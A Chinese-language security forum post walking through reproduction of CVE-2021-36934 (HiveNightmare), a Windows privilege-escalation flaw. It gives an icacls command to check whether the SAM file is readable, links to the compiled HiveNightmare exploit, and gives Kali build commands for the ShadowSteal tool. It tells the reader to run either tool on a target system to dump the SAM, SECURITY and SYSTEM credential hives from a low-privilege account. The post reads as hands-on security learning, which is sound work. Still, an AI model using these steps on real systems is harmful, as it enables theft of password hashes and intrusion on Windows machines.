搜索
查看: 1573|回复: 0

CVE-2021-36934 Windows提权漏洞复现

[复制链接]

675

主题

984

帖子

2489

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2489

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2021-7-25 22:52:24 | 显示全部楼层 |阅读模式
执行以下命令:
 icacls C:\windows\system32\config\sam


如果输出 BUILTIN\Users:(I)(RX) 表示该系统易受测试。
11.jpg
漏洞复现
EXP 地址为:https://github.com/GossiTheDog/HiveNightmare
作者编译好的 exe 文件:

https://github.com/GossiTheDog/HiveNightmare/releases/download/0.5/HiveNightmare.exe


直接将作者编译好的 HiveNightmare.exe 拷贝到目标系统上执行,这里以 Windows 10  为例。
12.jpg
可以看到在低权限账号下,成功利用 CVE-2021–36934 读取到了 SAM、SECURITY、SYSTEM 三个文件。
在kali下复现
 sudo apt-get install nim
nimble install zippy argparse
nimble install winim
sudo apt-get install mingw-w64
git clone [zxsq-anti-bbcode-url]https://github.com/HuskyHacks/ShadowSteal.git[zxsq-anti-bbcode-/url] && cd ShadowSteal
make && cd bin/ && ls -l

将编译好的 ShadowSteal.exe 放到目标系统上直接执行即可。
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表